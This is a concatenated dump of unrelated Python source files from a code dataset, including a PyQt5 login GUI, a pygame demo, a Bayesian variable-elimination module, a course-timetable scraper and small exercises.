dao.query_capture_data_by_hour(hour, dev_df)\n ac = AggregateCapture(my_config, dao, dfs, vg_c, models)\n org_dict = ac.capture_to_org(hour)\n for key in org_dict.keys():\n print(key,'\\n',org_dict[key].head())\n org_dict[key].to_csv('org_{}.csv'.format(key))\n\n\ndef main():\n starttime = '2018-12-13 15:00:00'\n pool = multiprocessing.Pool(processes=12)\n result = []\n for i in range(24*7):\n hour = tu.datetime_n_hours_before_string(tu.time_str_to_datetime(starttime), i)\n print(hour)\n result = pool.apply_async(t_agg_capture, (hour,))\n pool.close()\n pool.join()\n if result.successful():\n print('successful')\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"quality_control_platform/aggregate_capture/t_agg_capture.py","file_name":"t_agg_capture.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"458008173","text":"import sys\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import pyqtSlot\nimport database as db\nimport GUIWork\n\n\nclass WelcomeScreen(QMainWindow):\n def __init__(self):\n super(WelcomeScreen, self).__init__()\n self.iniUI()\n\n\n def iniUI(self):\n self.resize(320, 240)\n self.setMinimumSize(QtCore.QSize(320, 240))\n self.setMaximumSize(QtCore.QSize(320, 240))\n self.centralwidget = QtWidgets.QWidget(self)\n self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)\n\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setText(\" Machine Learning in a nutshell\")\n self.verticalLayout.addWidget(self.label)\n\n self.GuestButton = QtWidgets.QPushButton(self.centralwidget)\n self.GuestButton.setText(\"Guest\")\n self.verticalLayout.addWidget(self.GuestButton)\n\n self.LogInButton = QtWidgets.QPushButton(self.centralwidget)\n self.LogInButton.setText(\"LogIn\")\n self.verticalLayout.addWidget(self.LogInButton)\n self.LogInButton.clicked.connect(self.LogInScreen)\n\n\n self.SignUpButton = QtWidgets.QPushButton(self.centralwidget)\n self.SignUpButton.setText(\"SignUp\")\n self.verticalLayout.addWidget(self.SignUpButton)\n self.SignUpButton.clicked.connect(self.SignUpScreen)\n\n\n self.setCentralWidget(self.centralwidget)\n self.show()\n\n\n def LogInScreen(self):\n self.window = LogInScreen()\n self.window.show()\n self.close()\n\n\n def SignUpScreen(self):\n self.window = SignUpScreen()\n self.window.show()\n self.close()\n\n def MainMenuScreen(self):\n self.window = MainMenuScreen()\n self.window.show()\n self.close()\n\n def ImportDataScreen(self):\n self.window = MainMenuScreen()\n self.window.show()\n self.close()\n\n\nclass ImportDataScreen(WelcomeScreen):\n\n def iniUI(self):\n self.resize(640, 480)\n self.setMinimumSize(QtCore.QSize(640, 480))\n self.setMaximumSize(QtCore.QSize(640, 480))\n self.centralwidget = QtWidgets.QWidget(self)\n\n self.centralwidget = QtWidgets.QWidget(self)\n self.centralwidget.setObjectName(\"centralwidget\")\n\n self.listView = QtWidgets.QListView(self.centralwidget)\n self.listView.setGeometry(QtCore.QRect(20, 30, 281, 421))\n self.listView.setObjectName(\"listView\")\n\n self.addTableButton = QtWidgets.QPushButton(self.centralwidget)\n self.addTableButton.setGeometry(QtCore.QRect(340, 30, 261, 41))\n self.addTableButton.setText(\"Add New Table\")\n self.addTableButton.clicked.connect(self.ImportNewTable)\n\n self.editTableButton = QtWidgets.QPushButton(self.centralwidget)\n self.editTableButton.setGeometry(QtCore.QRect(340, 270, 261, 41))\n self.editTableButton.setText(\"Edit Existing Table\")\n\n self.removeTableButton = QtWidgets.QPushButton(self.centralwidget)\n self.removeTableButton.setGeometry(QtCore.QRect(340, 340, 261, 41))\n self.removeTableButton.setText(\"Remove Existing Table\")\n\n self.BackButton = QtWidgets.QPushButton(self.centralwidget)\n self.BackButton.setGeometry(QtCore.QRect(390, 420, 161, 25))\n self.BackButton.setText(\"Back to Main Menu\")\n self.BackButton.clicked.connect(self.MainMenuScreen)\n\n self.verticalScrollBar = QtWidgets.QScrollBar(self.centralwidget)\n self.verticalScrollBar.setGeometry(QtCore.QRect(280, 30, 20, 411))\n self.verticalScrollBar.setOrientation(QtCore.Qt.Vertical)\n self.verticalScrollBar.setObjectName(\"verticalScrollBar\")\n\n self.buttonBox = QtWidgets.QDialogButtonBox(self.centralwidget)\n self.buttonBox.setGeometry(QtCore.QRect(400, 230, 151, 25))\n self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)\n self.buttonBox.setObjectName(\"buttonBox\")\n\n self.listView_2 = QtWidgets.QListView(self.centralwidget)\n self.listView_2.setGeometry(QtCore.QRect(340, 80, 261, 131))\n self.listView_2.setObjectName(\"listView_2\")\n\n self.verticalScrollBar_2 = QtWidgets.QScrollBar(self.centralwidget)\n self.verticalScrollBar_2.setGeometry(QtCore.QRect(580, 80, 20, 131))\n self.verticalScrollBar_2.setOrientation(QtCore.Qt.Vertical)\n self.verticalScrollBar_2.setObjectName(\"verticalScrollBar_2\")\n\n self.setCentralWidget(self.centralwidget)\n\n\n def MainMenuScreen(self):\n self.window = MainMenuScreen()\n self.window.show()\n self.close()\n\n def ImportNewTable(self):\n self.window = ImportNewTable()\n self.window.show()\n self.close()\n\n\nclass LogInScreen(WelcomeScreen):\n\n def LogInButtonClk(self):\n info_tuple = (self.UsernameLineEdit.text(),self.PasswordLineEdit.text())\n exist = db.LogIn(info_tuple)\n if exist == 0:\n self.window = MainMenuScreen()\n self.window.show()\n self.close()\n elif exist == 1:\n self.msg = QMessageBox()\n self.msg.setIcon(QMessageBox.Information)\n self.msg.setText(\"Username does not exist!\")\n self.msg.show() \n else:\n self.msg = QMessageBox()\n self.msg.setIcon(QMessageBox.Information)\n self.msg.setText(\"Password is wrong\")\n self.msg.show() \n\n def iniUI(self):\n self.resize(320, 240)\n self.setMinimumSize(QtCore.QSize(320, 240))\n self.setMaximumSize(QtCore.QSize(320, 240))\n self.centralwidget = QtWidgets.QWidget(self)\n\n self.BackButton = QtWidgets.QPushButton(self.centralwidget)\n self.BackButton.setGeometry(QtCore.QRect(230, 210, 89, 25))\n self.BackButton.setText(\"Back\")\n self.BackButton.clicked.connect(self.WelcomeScreen)\n\n self.PasswordButton = QtWidgets.QLabel(self.centralwidget)\n self.PasswordButton.setGeometry(QtCore.QRect(10, 100, 71, 46))\n self.PasswordButton.setText(\"Password:\")\n\n self.UsernameButton = QtWidgets.QLabel(self.centralwidget)\n self.UsernameButton.setGeometry(QtCore.QRect(10, 50, 81, 41))\n self.UsernameButton.setText(\"Username:\")\n\n self.UsernameLineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.UsernameLineEdit.setGeometry(QtCore.QRect(90, 60, 211, 25))\n\n self.PasswordLineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.PasswordLineEdit.setGeometry(QtCore.QRect(90, 110, 211, 25))\n\n self.LogInButton = QtWidgets.QPushButton(self.centralwidget)\n self.LogInButton.setGeometry(QtCore.QRect(10, 150, 291, 25))\n self.LogInButton.setText(\"Log In\")\n #self.LogInButton.clicked.connect(self.LogInButtonClk) # ENGAGE AGAIN\n self.window = MainMenuScreen() # ENGAGE AGAIN\n self.window.show() # ENGAGE AGAIN\n self.close() # ENGAGE AGAIN\n \n\n self.setCentralWidget(self.centralwidget)\n self.show()\n\n def WelcomeScreen(self):\n self.window = WelcomeScreen()\n self.window.show()\n self.close()\n\n def MainMenuScreen(self):\n print(\"hello\")\n self.window = MainMenuScreen()\n self.window.show()\n self.close()\n\n\nclass MainMenuScreen(WelcomeScreen):\n\n def iniUI(self):\n self.resize(320, 240)\n self.setMinimumSize(QtCore.QSize(320, 240))\n self.setMaximumSize(QtCore.QSize(320, 240))\n self.centralwidget = QtWidgets.QWidget(self)\n self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)\n\n self.WelcomeLabel = QtWidgets.QLabel(self.centralwidget)\n self.WelcomeLabel.setText(\" Welcome \\\"User\\\"\")\n self.verticalLayout.addWidget(self.WelcomeLabel)\n\n self.AddDataButton = QtWidgets.QPushButton(self.centralwidget)\n self.AddDataButton.setText(\"Add/Modify Data\")\n self.verticalLayout.addWidget(self.AddDataButton)\n self.AddDataButton.clicked.connect(self.ImportDataScreen)\n\n self.StatisticsButton = QtWidgets.QPushButton(self.centralwidget)\n self.StatisticsButton.setText(\"Statistics/Machine Learning\")\n self.verticalLayout.addWidget(self.StatisticsButton)\n self.StatisticsButton.clicked.connect(self.GuiWork)\n\n self.LogOutButton = QtWidgets.QPushButton(self.centralwidget)\n self.LogOutButton.setText(\"Log Out\")\n self.verticalLayout.addWidget(self.LogOutButton)\n self.LogOutButton.clicked.connect(self.WelcomeScreen)\n\n self.setCentralWidget(self.centralwidget)\n\n\n def GuiWork(self):\n self.window = GUIWork.Workbench()\n self.window.show()\n self.close()\n\n def WelcomeScreen(self):\n self.window = WelcomeScreen()\n self.window.show()\n self.close()\n\n def ImportDataScreen(self):\n self.window = ImportDataScreen()\n self.window.show()\n self.close()\n \n \nclass SignUpScreen(WelcomeScreen):\n\n def SignUpButtonClk(self):\n info_tuple = (self.UsernameLineEdit.text(),self.PasswordLineEdit.\n text(),self.EmailLineEdit.text(),self.FirstNameLineEdit.text(),\n self.LastNameLineEdit.text(),self.CompanyLineEdit.text())\n if db.SignUp(info_tuple) == True:\n self.window = LogInScreen()\n self.msg = QMessageBox()\n self.msg.setIcon(QMessageBox.Information)\n self.msg.setText(\"Your new account has been created!\")\n self.msg.show()\n self.window.show()\n self.close()\n else:\n self.msg = QMessageBox()\n self.msg.setIcon(QMessageBox.Warning)\n self.msg.setText(\"Error\")\n self.msg.show()\n\n\n def iniUI(self):\n self.resize(480, 640)\n self.centralwidget = QtWidgets.QWidget(self)\n\n self.BackButton = QtWidgets.QPushButton(self.centralwidget)\n self.BackButton.setGeometry(QtCore.QRect(320, 470, 131, 25))\n self.BackButton.setText(\"Back\")\n self.BackButton.clicked.connect(self.WelcomeScreen)\n\n self.UsernameLineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.UsernameLineEdit.setGeometry(QtCore.QRect(110, 110, 331, 25))\n\n self.PasswordLineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.PasswordLineEdit.setGeometry(QtCore.QRect(110, 160, 331, 25))\n\n self.UsernameButton = QtWidgets.QLabel(self.centralwidget)\n self.UsernameButton.setGeometry(QtCore.QRect(20, 100, 81, 41))\n self.UsernameButton.setText(\"Username\")\n\n self.PasswordButton = QtWidgets.QLabel(self.centralwidget)\n self.PasswordButton.setGeometry(QtCore.QRect(20, 150, 71, 46))\n self.PasswordButton.setText(\"Password\")\n\n self.SignUpButton = QtWidgets.QPushButton(self.centralwidget)\n self.SignUpButton.setGeometry(QtCore.QRect(0, 440, 291, 91))\n self.SignUpButton.setText(\"Sign Up\")\n self.SignUpButton.clicked.connect(self.SignUpButtonClk)\n \n self.TitleButton = QtWidgets.QLabel(self.centralwidget)\n self.TitleButton.setGeometry(QtCore.QRect(60, 50, 391, 17))\n self.TitleButton.setText(\"Please fill your information to create an account\")\n\n self.EmailButton = QtWidgets.QLabel(self.centralwidget)\n self.EmailButton.setGeometry(QtCore.QRect(20, 210, 71, 46))\n self.EmailButton.setText(\"Email\")\n\n self.EmailLineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.EmailLineEdit.setGeometry(QtCore.QRect(110, 220, 331, 25))\n\n self.FirstNameButton = QtWidgets.QLabel(self.centralwidget)\n self.FirstNameButton.setGeometry(QtCore.QRect(20, 270, 91, 31))\n self.FirstNameButton.setText(\"First Name*\")\n\n self.LastNameButton = QtWidgets.QLabel(self.centralwidget)\n self.LastNameButton.setGeometry(QtCore.QRect(20, 320, 91, 31))\n self.LastNameButton.setText(\"Last Name*\")\n\n self.CompanyButton = QtWidgets.QLabel(self.centralwidget)\n self.CompanyButton.setGeometry(QtCore.QRect(20, 370, 91, 31))\n self.CompanyButton.setText(\"Company\")\n\n self.FirstNameLineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.FirstNameLineEdit.setGeometry(QtCore.QRect(110, 270, 331, 25))\n\n self.LastNameLineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.LastNameLineEdit.setGeometry(QtCore.QRect(110, 320, 331, 25))\n\n self.CompanyLineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.CompanyLineEdit.setGeometry(QtCore.QRect(110, 370, 331, 25))\n\n self.OptionalButton = QtWidgets.QLabel(self.centralwidget)\n self.OptionalButton.setGeometry(QtCore.QRect(270, 570, 211, 21))\n self.OptionalButton.setText(\"The fields with * are optional\")\n\n self.setCentralWidget(self.centralwidget)\n self.show()\n\n\n\n def WelcomeScreen(self):\n self.window = WelcomeScreen()\n self.window.show()\n self.close()\n\n\nclass ImportNewTable(WelcomeScreen):\n def iniUI(self):\n self.resize(640, 480)\n self.centralwidget = QtWidgets.QWidget(self)\n\n self.HeaderCheckBox = QtWidgets.QCheckBox(self.centralwidget)\n self.HeaderCheckBox.setGeometry(QtCore.QRect(20, 180, 161, 23))\n self.HeaderCheckBox.setText(\"First line header?\")\n\n self.ChooseTypeLabel = QtWidgets.QLabel(self.centralwidget)\n self.ChooseTypeLabel.setGeometry(QtCore.QRect(30, 80, 161, 17))\n self.ChooseTypeLabel.setText(\"Choose the type of file\")\n\n self.ChooseFilePushButton = QtWidgets.QPushButton(self.centralwidget)\n self.ChooseFilePushButton.setGeometry(QtCore.QRect(10, 20, 89, 25))\n self.ChooseFilePushButton.setText(\"Choose File\")\n\n self.ExcelPushButton = QtWidgets.QPushButton(self.centralwidget)\n self.ExcelPushButton.setGeometry(QtCore.QRect(10, 110, 61, 25))\n self.ExcelPushButton.setText(\"Excel\")\n\n self.CSVPushButton = QtWidgets.QPushButton(self.centralwidget)\n self.CSVPushButton.setGeometry(QtCore.QRect(80, 110, 61, 25))\n self.CSVPushButton.setText(\"CSV\")\n\n self.TSVPushButton = QtWidgets.QPushButton(self.centralwidget)\n self.TSVPushButton.setGeometry(QtCore.QRect(150, 110, 61, 25))\n self.TSVPushButton.setText(\"TSV\")\n\n self.ResetPushButton = QtWidgets.QPushButton(self.centralwidget)\n self.ResetPushButton.setGeometry(QtCore.QRect(10, 440, 161, 25))\n self.ResetPushButton.setText(\"Reset\")\n\n self.TableView = QtWidgets.QTableView(self.centralwidget)\n self.TableView.setGeometry(QtCore.QRect(250, 20, 361, 401))\n\n self.BackPushButton = QtWidgets.QPushButton(self.centralwidget)\n self.BackPushButton.setGeometry(QtCore.QRect(450, 440, 161, 25))\n self.BackPushButton.setText(\"Back\")\n self.BackPushButton.clicked.connect(self.ImportDataScreen)\n\n self.VerticalScrollBar = QtWidgets.QScrollBar(self.centralwidget)\n self.VerticalScrollBar.setGeometry(QtCore.QRect(590, 19, 20, 401))\n self.VerticalScrollBar.setOrientation(QtCore.Qt.Vertical)\n\n self.setCentralWidget(self.centralwidget)\n self.show()\n\n def ImportDataScreen(self):\n self.window = ImportDataScreen()\n self.window.show()\n self.close() \n\n \n\n\nif __name__=='__main__':\n app = QApplication(sys.argv)\n ex = WelcomeScreen()\n sys.exit(app.exec_())\n","sub_path":"GUI/GUIMainMenu.py","file_name":"GUIMainMenu.py","file_ext":"py","file_size_in_byte":15418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"119216692","text":"import pygame\nimport sys\n\npygame.init()\nhintergrund = pygame.image.load(\"Bilder\\Karte\\Level1.png\")\nscreen = pygame.display.set_mode([816,624])\nclock = pygame.time.Clock()\npygame.display.set_caption(\"ver1\")\n\nx = 300\ny = 300\n\ngeschw = 3\nbreite = 48\nhoehe = 48\n\nlinkeWand = pygame.draw.rect(screen, (0,0,0), (0,0,48,624),0)\nrechteWand = pygame.draw.rect(screen, (0,0,0), (816,0,-48,624),0)\nobenWand = pygame.draw.rect(screen, (0,0,0), (0,0,816,48),0)\nuntenWand = pygame.draw.rect(screen,(0,0,0),(0,624,816,-48),0)\n\ndef zeichnen():\n screen.blit(hintergrund, (0, 0))\n pygame.draw.rect(screen, (255, 0, 0), (x, y, breite, hoehe))\n pygame.display.update()\n\ngo = True\n\nwhile go:\n for event in pygame.event.get():\n if event.type == pygame.QUIT: sys.exit()\n\n spielerRechteck = pygame.Rect(x, y, 48, 48)\n\n gedrueckt = pygame.key.get_pressed()\n\n if gedrueckt[pygame.K_UP] and not spielerRechteck.colliderect(obenWand):\n y -= geschw\n if gedrueckt[pygame.K_RIGHT] and not spielerRechteck.colliderect(rechteWand):\n x += geschw\n if gedrueckt[pygame.K_DOWN] and not spielerRechteck.colliderect(untenWand):\n y += geschw\n if gedrueckt[pygame.K_LEFT] and not spielerRechteck.colliderect(linkeWand):\n x -= geschw\n\n zeichnen()\n clock.tick(60)","sub_path":"Pygame/Beleg/alt/ver2.py","file_name":"ver2.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"519117164","text":"# Copyright (c) 2013 Víctor J. Marín \n#\n# Permission is hereby granted, free of charge, to any person\n# obtaining a copy of this software and associated documentation\n# files (the \"Software\"), to deal in the Software without\n# restriction, including without limitation the rights to use,\n# copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following\n# conditions:\n\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES\n# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\n# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\n# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR\n# OTHER DEALINGS IN THE SOFTWARE.\n\nimport copy\nimport itertools\nimport utils.utils as utils\n\nfrom inference.Factor import Factor\n\n\n# Obtener las variables ocultas\ndef get_hidden_variables(relevant_factors, query_variable):\n\n hidden_vars = [copy.copy(factor.factors) for factor in relevant_factors]\n\n hidden_vars = set(itertools.chain.from_iterable(hidden_vars)) - set([query_variable])\n\n return hidden_vars\n\n\ndef sum_out(elimination_variable, relevant_factors, mode, eliminated_factors, query_variable):\n\n appearing_factors = utils.appearing_factors(elimination_variable, relevant_factors)\n\n if mode == 'verbose':\n\n print('Procesando ' + str(elimination_variable) + '...\\n')\n print('Factores en los que aparece: ' + str([str(f) for f in appearing_factors]))\n\n __get_final_factor(appearing_factors, elimination_variable, relevant_factors, eliminated_factors, query_variable, mode)\n\n\ndef __get_final_factor(appearing_factors, elimination_variable, relevant_factors, eliminated_factors, query_variable, mode):\n\n while(len(appearing_factors) > 1):\n\n f1 = appearing_factors.pop(0)\n if f1 in relevant_factors:\n relevant_factors.remove(f1)\n eliminated_factors.append(f1)\n\n f2 = appearing_factors.pop(0)\n if f2 in relevant_factors:\n relevant_factors.remove(f2)\n eliminated_factors.append(f2)\n\n new_factor = multiply(f1, f2)\n appearing_factors.append(new_factor)\n\n # Factor final resultante de eliminar la variable en cuestion multiplicando los factores en los que aparece 2 a 2.\n resulting_factor = appearing_factors[0]\n\n # Si la variable aparecia en un solo factor, eliminar de factores relevantes ya que no habra sido eliminada anteriormente.\n if resulting_factor in relevant_factors:\n relevant_factors.remove(resulting_factor)\n\n # Si la variable no es de consulta, agrupar el factor resultante por ella.\n if elimination_variable != query_variable:\n resulting_factor = __group_factor_by(resulting_factor, elimination_variable)\n\n # Si hay un factor resultante (no es None) y no esta en los factores relevantes, ponerlo entre ellos.\n if resulting_factor and (resulting_factor not in relevant_factors):\n relevant_factors.append(resulting_factor)\n\n if mode == 'verbose':\n print('Factor resultante: ' + str(resulting_factor))\n print('\\nFactores actuales: ' + str([str(factor) for factor in relevant_factors]))\n print('Factores eliminados: ' + str([str(factor) for factor in eliminated_factors]) + '\\n')\n\n\ndef multiply(f1, f2):\n \"\"\"\n Devuelve el producto de dos factores.\n\n @type f1: Factor\n @param f1: Primer factor.\n\n @type f2: Factor\n @param f2: Segundo factor.\n\n @rtype: Factor\n @return: Factor resultante de realizar la multiplicacion.\n \"\"\"\n # Obtener las variables que aparecen en ambos factores.\n f1_vars = copy.copy(f1.factors)\n f2_vars = copy.copy(f2.factors)\n\n # Calcular interseccion entre las variables de ambos factores.\n vars_intersection = list(set(f1_vars) & set(f2_vars))\n\n vars_indexes = [[], []]\n\n # Ver la posicion que ocupa cada variable comun a ambos factores en cada uno de ellos.\n for var in vars_intersection:\n vars_indexes[0].append(f1_vars.index(var))\n vars_indexes[1].append(f2_vars.index(var))\n\n reversed_indexes = copy.copy(vars_indexes[0])\n reversed_indexes.sort(reverse = True)\n\n f1_cpt = f1.cpt\n f2_cpt = f2.cpt\n\n new_cpt = {}\n for k1 in f1_cpt.keys():\n\n for k2 in f2_cpt.keys():\n\n # Obtener los valores de dominio para cada variable de la intersección en cada entrada de la tabla de probabilidad del primer factor.\n k1_domain_value = []\n if isinstance(k1, str):\n k1_domain_value = [k1]\n else:\n for var_index_f1 in vars_indexes[0]:\n k1_domain_value.append(k1[var_index_f1])\n\n # Obtener los valores de dominio para cada variable de la intersección en cada entrada de la tabla de probabilidad del segundo factor.\n k2_domain_value = []\n if isinstance(k2, str):\n k2_domain_value = [k2]\n else:\n for var_index_f2 in vars_indexes[1]:\n k2_domain_value.append(k2[var_index_f2])\n\n # Si coinciden los valores del dominio, multiplicar.\n if k1_domain_value == k2_domain_value:\n\n new_key = list(k1)\n\n if isinstance(k1, str):\n new_key = []\n else:\n for var_index_f1 in reversed_indexes:\n new_key.pop(var_index_f1)\n\n if isinstance(k2, str):\n new_key += list([k2])\n else:\n new_key += list(k2)\n\n new_key = utils.proper_key(new_key)\n new_cpt[new_key] = f1_cpt[k1] * f2_cpt[k2]\n\n new_factors = f1_vars\n for var_index_f1 in reversed_indexes:\n new_factors.pop(var_index_f1)\n\n new_factors += f2_vars\n new_factor = Factor(new_factors, new_cpt, False)\n\n return new_factor\n\n\ndef __group_factor_by(factor, variable):\n \"\"\"\n Agrupa el factor por la variable deseada.\n\n @type factor: Factor\n @param factor: Factor a agrupar.\n\n @type variable: Node\n @param variable: Variable por la que agrupar.\n\n @rtype: Factor\n @return: Factor resultante de agrupar la variable.\n \"\"\"\n new_factor = None\n\n if len(factor.factors) > 1:\n var_position = factor.factors.index(variable)\n\n new_cpt = {}\n\n keys = copy.copy(list(factor.cpt.keys()))\n\n while(keys):\n\n key = keys.pop(0)\n keys_to_be_grouped = []\n domain = set(variable.domain) - set([key[var_position]])\n\n # Generar todas las variantes posibles de key con el dominio de la variable por la que se agrupa.\n for domain_value in domain:\n k = list(key)\n k[var_position] = domain_value\n k = utils.proper_key(k)\n keys.remove(k)\n keys_to_be_grouped.append(k)\n\n # Sumar los valores de todas esas tuplas.\n summatory = factor.cpt[key]\n for key in keys_to_be_grouped:\n summatory += factor.cpt[key]\n\n # Actualizar nueva CPT.\n new_key = list(key)\n new_key.pop(var_position)\n new_key = utils.proper_key(new_key)\n new_cpt[new_key] = summatory\n\n new_factors = [f for f in factor.factors if f != variable]\n new_factor = Factor(new_factors, new_cpt)\n\n return new_factor\n","sub_path":"src/inference/algorithms/variable_elimination/sumout.py","file_name":"sumout.py","file_ext":"py","file_size_in_byte":7843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"505599056","text":"\ndef outer_function():\n # remove the nonolocal call here to make code work (and see what the difference is versus global)\n nonlocal a ## this will result in the inner_function call havning nothin to bind to in this nonlocal (but nonglobal) context, and thus will generate and error.\n a = 20\n def inner_function():\n nonlocal a\n a = 30\n print('a =', a)\n\n inner_function()\n print('a =', a)\na = 10\nouter_function()\nprint('a =', a)\n","sub_path":"Class Notes/w03c08/scoping3.py","file_name":"scoping3.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"528289048","text":"import json\nimport logging\n\nfrom flask import Response\nfrom flask import request\n\nfrom plugins_v2._login_v2.login_v2 import login\nfrom . import api\nfrom .config import class_course_table_url, pre_class_course_table_url, NAME, PASSWD\n\n\n@api.route('/GetClassCourseTable', methods=['GET'])\ndef handle_get_course_table():\n class_name = request.args.get('class', \"\")\n res = get_class_course_table(class_name)\n resp = Response(json.dumps(res), mimetype='application/json')\n return resp\n\n\ndef get_class_course_table(class_name):\n message = \"OK\"\n code = 0\n data = []\n if len(class_name) < 1:\n code = -6\n message = \"关键词不能为空\"\n else:\n session = login(NAME, PASSWD)\n if isinstance(session, str):\n code = -2\n message = \"查询失败\"\n logging.warning(\"全局账号登录失败:%s\" % message)\n else:\n post_data = {\n \"xnm\": \"2019\",\n \"xqm\": \"12\",\n \"xqh_id\": \"01\",\n \"njdm_id\": \"\",\n \"jg_id\": \"\",\n \"zyh_id\": \"\",\n \"zyfx_id\": \"\",\n \"bh_id\": class_name,\n \"_search\": \"false\",\n \"queryModel.showCount\": \"1\",\n }\n pre_data = session.post(\"http://222.31.49.139/jwglxt/kbdy/bjkbdy_cxBjkbdyTjkbList.html?gnmkdm=N214505\",\n data=post_data).json()\n if not pre_data[\"items\"]:\n code = -6\n message = \"无效的班级号\"\n else:\n post_data = {\n \"xnm\": \"2019\",\n \"xqm\": \"12\",\n \"xqh_id\": \"01\",\n \"njdm_id\": \"\",\n \"jg_id\": \"\",\n \"zyh_id\": \"\",\n \"zyfx_id\": \"\",\n \"bh_id\": class_name,\n \"_search\": \"false\",\n \"queryModel.showCount\": \"1\",\n }\n pre_data = session.post(pre_class_course_table_url, data=post_data).json()\n if not pre_data[\"items\"]:\n code = -6\n message = \"无效的班级号\"\n else:\n post_data = {\n \"xnm\": \"2019\",\n \"xqm\": \"12\",\n \"xnmc\": \"2019-2020\",\n \"xqmmc\": \"2\",\n \"xqh_id\": \"01\",\n \"njdm_id\": pre_data[\"items\"][0][\"njdm_id\"],\n \"zyh_id\": pre_data[\"items\"][0][\"zyh_id\"],\n \"bh_id\": class_name,\n \"tjkbzdm\": \"1\",\n \"tjkbzxsdm\": \"0\",\n # \"zxszjjs\": True\n }\n\n course_table = session.post(class_course_table_url, data=post_data).json()\n tables = []\n cnt = 0\n name_dict = {}\n for index, table in enumerate(course_table[\"kbList\"]):\n spited = table[\"jcor\"].split(\"-\")\n if table[\"kcmc\"] not in name_dict:\n name_dict[table[\"kcmc\"]] = cnt\n cnt += 1\n tables.append({\n # \"Course_Number\": table[\"kch_id\"],\n \"Course_Name\": table[\"kcmc\"],\n # \"Course_Credit\": table[\"xf\"],\n # \"Course_Test_Type\": table[\"khfsmc\"],\n \"Course_Teacher\": table.get(\"xm\"),\n \"Course_Week\": table[\"zcd\"],\n \"Course_Color\": name_dict[table[\"kcmc\"]],\n \"Course_Time\": table[\"xqj\"],\n \"Course_Start\": spited[0],\n \"Course_Length\": int(spited[1]) - int(spited[0]) + 1,\n \"Course_Building\": table.get(\"xqmc\"),\n \"Course_Classroom\": table.get(\"cdmc\")\n })\n # for d in course_table[\"sjkList\"]:\n # tables.append({\n # \"Course_Name\": d[\"sjkcgs\"]\n # })\n # TODO 兼容现有客户端\n data = tables\n return {\"message\": message, \"code\": code, \"data\": data}\n","sub_path":"plugins_v2/get_class_course_table_v2/get_class_course_table_v2.py","file_name":"get_class_course_table_v2.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"68772293","text":"inp=int(input())\narray=list(map(int,input().split()))\nfor i in range(0,len(array)):\n if(i==array[i]):\n print(array[i],end=\" \")\ncount=0\nfor i in range(0,len(array)): \n if (i!=array[i]):\n count+=1\nif(count==len(array)):\n print(-1)\n","sub_path":"valequalindex.py","file_name":"valequalindex.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"215895955","text":"import threading\nimport time\nclass Counter():\n def __init__(self):\n self.count = 0\n def increment(self):\n self.count += 1\n def get_count(self):\n return self.count\n\ndef count_up_100000(counter):\n for i in range(100000):\n counter.increment()\n\n# counter = Counter()\n# initial_count = counter.get_count()\n# count_up_100000(counter)\n# final_count = counter.get_count()\n# print(final_count)\n\n\ncounter = Counter()\n#count_thread = threading.Thread(target=count_up_100000, args=[counter])\ncount_thread = threading.Thread(target=count_up_100000, args=(counter,))\ncount_thread.start()\nmid_join = counter.get_count()\ncount_thread.join()\nafter_join = counter.get_count()\nprint(\"mid_join _{}\".format(mid_join))\nprint(after_join)\n#\n# mid_join _24695\n# 100000","sub_path":"Py_op/Mul_process/Mul_process_thread/mul_process_log10.py","file_name":"mul_process_log10.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"484861145","text":"\nimport pandas\nimport sklearn\nimport itertools\nimport numpy\nfrom scipy.stats import pearsonr,spearmanr\nfrom sklearn.metrics.regression import mean_absolute_error,mean_squared_error\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import StandardScaler\nfrom ast import literal_eval\n# from read_config import read_conf\n\n\n\n\n\nimport pandas\nimport itertools\nimport numpy\nfrom scipy.stats import pearsonr,spearmanr\nfrom sklearn.metrics.regression import 